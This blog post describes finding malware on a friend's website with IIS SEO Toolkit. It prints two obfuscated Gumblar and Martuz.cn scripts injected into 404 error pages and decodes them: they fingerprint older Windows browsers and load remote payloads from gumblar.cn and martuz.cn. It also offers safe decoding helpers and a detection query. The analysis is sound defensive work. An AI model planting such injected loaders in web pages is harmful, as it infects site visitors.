Finding malware in your Web Site using IIS SEO Toolkit
The other day a friend of mine who owns a Web site asked me to look at it to see if I could spot anything weird, because according to his Web hosting provider, Google was flagging it as infected with malware.
My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and looked for anything suspicious in them, but was not able to find anything. My friend then went back to his hosting provider, told them that nothing problematic had been found, and asked whether it could be something in the server configuration, to which they replied sarcastically that it was probably ignorance on the part of his Web site designer.
Enter IIS SEO Toolkit
So of course I decided the first thing I would do was crawl the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site had. I knew that malware usually hides either in executables or in scripts on the server, so I started by looking at the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.
I was surprised not to find a single executable and to see only two very simple JavaScript files, which did not look like malware in any way. From previous experience I knew that malware in HTML pages is usually hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features, since they exist for a reason, but it was a good way to start narrowing down the pages.
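The same heuristic can be sketched outside the toolkit. This is only an illustration and not how IIS SEO Toolkit runs its query: the hypothetical function `findSuspiciousPages` takes an array of `{ url, html }` objects (an assumed shape for pages that were already downloaded) and returns the URLs whose markup contains both words. Unlike a plain substring match, the sketch uses word boundaries, which is a choice made here to cut down on false positives.

```javascript
// Heuristic scan: flag pages whose markup mentions both "eval" and "unescape".
// The { url, html } page shape and the function names are assumptions made
// for this sketch; they are not part of IIS SEO Toolkit.
function containsWord(text, word) {
  // \b keeps "eval" from matching inside words such as "medieval".
  return new RegExp("\\b" + word + "\\b").test(text);
}

function findSuspiciousPages(pages) {
  return pages
    .filter((page) => containsWord(page.html, "eval") && containsWord(page.html, "unescape"))
    .map((page) => page.url);
}

// Made-up sample data: one harmless page and one with an encoded script.
const samplePages = [
  { url: "/index.html", html: "<p>A medieval castle</p>" },
  { url: "/missing", html: "<script>var s=unescape('%61');eval(s)</script>" },
];
console.log(findSuspiciousPages(samplePages)); // [ '/missing' ]
```

A match is only a hint that a page deserves a closer look, since legitimate scripts can use both functions.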
Gumblar and Martuz.cn Malware on sight
After running that query, I got a set of HTML files that all returned status code 404 – NOT FOUND. Double-clicking any of them and looking at the HTML markup made it immediately obvious they were infected with malware. Look at the following markup:
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<script language=javascript><!--
(function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
--></script><script language=javascript><!--
(function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
--></script><BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at **********
</ADDRESS>
</BODY>
</HTML>
Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.
For those of you who, like me, do not particularly enjoy reading encoded JavaScript: all these two scripts do is unescape the funky looking string and then execute it. I have decoded the script that would get executed and show it below to showcase how this malware works. Note how both target Windows versions earlier than Vista (the user agent must contain "Win" but not "NT 6"), and how the second one also skips Chrome, before requesting a particular script that will cause the real damage.
var a = "ScriptEngine",
    b = "Version()+",
    j = "",
    u = navigator.userAgent;
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
    zrvzts = "A";
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
}
And:
var a = "ScriptEngine",
    b = "Version()+",
    j = "",
    u = navigator.userAgent;
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
    zrvzts = "A";
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
    document.write("<script src=//martuz.cn/vid/?id=" + j + "><\/script>");
}
Notice how both of them end up writing a script tag that loads the actual malware from gumblar.cn and martuz.cn.
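If you want to decode a script like this yourself, the important part is to never call eval on it. The following is a minimal sketch of one way to do that, assuming the payload is plain ASCII percent-encoding with the "%" swapped for another character, as in the two samples above. The helper names `decodePayload` and `extractScriptHosts` are made up for this example.

```javascript
// Decode a Gumblar-style payload for inspection WITHOUT running it.
// The malware swaps "%" for another delimiter, then calls unescape() and eval().
// Here we undo the swap and percent-decode, but never call eval.
// decodePayload and extractScriptHosts are hypothetical helper names.
function decodePayload(encoded, delimiter) {
  // split/join replaces every occurrence without any regex escaping concerns.
  const percentEncoded = encoded.split(delimiter).join("%");
  // Assumes the payload is ASCII percent-encoding, as in the samples above.
  return decodeURIComponent(percentEncoded);
}

function extractScriptHosts(decoded) {
  // Looks for protocol-relative sources such as src=//host/path
  const hosts = [];
  const pattern = /src=\/\/([^\/"'\s>]+)/g;
  let match;
  while ((match = pattern.exec(decoded)) !== null) {
    hosts.push(match[1]);
  }
  return hosts;
}

// A short fragment taken from the start of the first script above.
const fragment = 'va"72"20a"3d"22Scr"69pt"45ng"69ne"22';
console.log(decodePayload(fragment, '"')); // var a="ScriptEngine"
```

Be aware that simple pattern matching on the decoded text has limits: the second script builds its host name from two concatenated string pieces, so a pattern like the one in `extractScriptHosts` would only capture the first piece.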
Final data
Now, this clearly means they are infected with malware, and it strongly suggests that the problem is not in the Web application: the infection is in the error pages that the server returns when an error happens. To be able to guide them with more specifics, my next step was to determine which Web server they were using. That is as easy as inspecting the response headers in IIS SEO Toolkit, which displayed something like the ones shown below:
Content-Length: 2570
Content-Type: text/html
Date: Sat, 20 Jun 2009 01:16:23 GMT
Last-Modified: Sun, 17 May 2009 06:43:38 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
With a big disclaimer that I know nothing about Apache, I then told them to look for ErrorDocument directives in their .htaccess and httpd.conf files. That would show them which files were infected and whether the problem was in their application or in the server.
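As a rough illustration of that last step, the sketch below lists the ErrorDocument directives found in a piece of Apache configuration text, so you know which error page files to inspect. It assumes the usual `ErrorDocument <status code> <target>` form; the function name `findErrorDocuments` and the sample paths are made up for this example, and reading the actual .htaccess or httpd.conf file is left out.

```javascript
// List ErrorDocument directives found in Apache configuration text.
// Input is the text of an .htaccess or httpd.conf file, read elsewhere.
// findErrorDocuments is a hypothetical helper name for this sketch.
function findErrorDocuments(configText) {
  const results = [];
  for (const rawLine of configText.split(/\r?\n/)) {
    const line = rawLine.trim();
    if (line.startsWith("#")) continue; // skip comment lines
    // Directive names are case-insensitive: ErrorDocument <code> <target>
    const match = /^ErrorDocument\s+(\d{3})\s+(.+)$/i.exec(line);
    if (match) {
      results.push({ status: Number(match[1]), target: match[2] });
    }
  }
  return results;
}

// Made-up configuration text; the paths are placeholders.
const sampleConfig = [
  "# custom error pages",
  "ErrorDocument 404 /errors/404.html",
  "ErrorDocument 500 /errors/500.html",
].join("\n");
console.log(findErrorDocuments(sampleConfig));
```

Each target that points to a local file is a candidate to open and check for the encoded scripts shown earlier.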
Case Closed
It turns out that after my friend went back to the hosting provider with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me identify this quickly because it is able to see the Web site with the same eyes as a search engine would, following every link and letting me run easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of thing in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and load with "Open Query" to see if you are infected with this malware.
<query dataSource="urls">
  <filter>
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <expression field="FileContents" operator="Contains" value="unescape" />
    <expression field="FileContents" operator="Contains" value="eval" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="StatusCode" />
    <field name="Title" />
    <field name="Description" />
  </displayFields>
</query>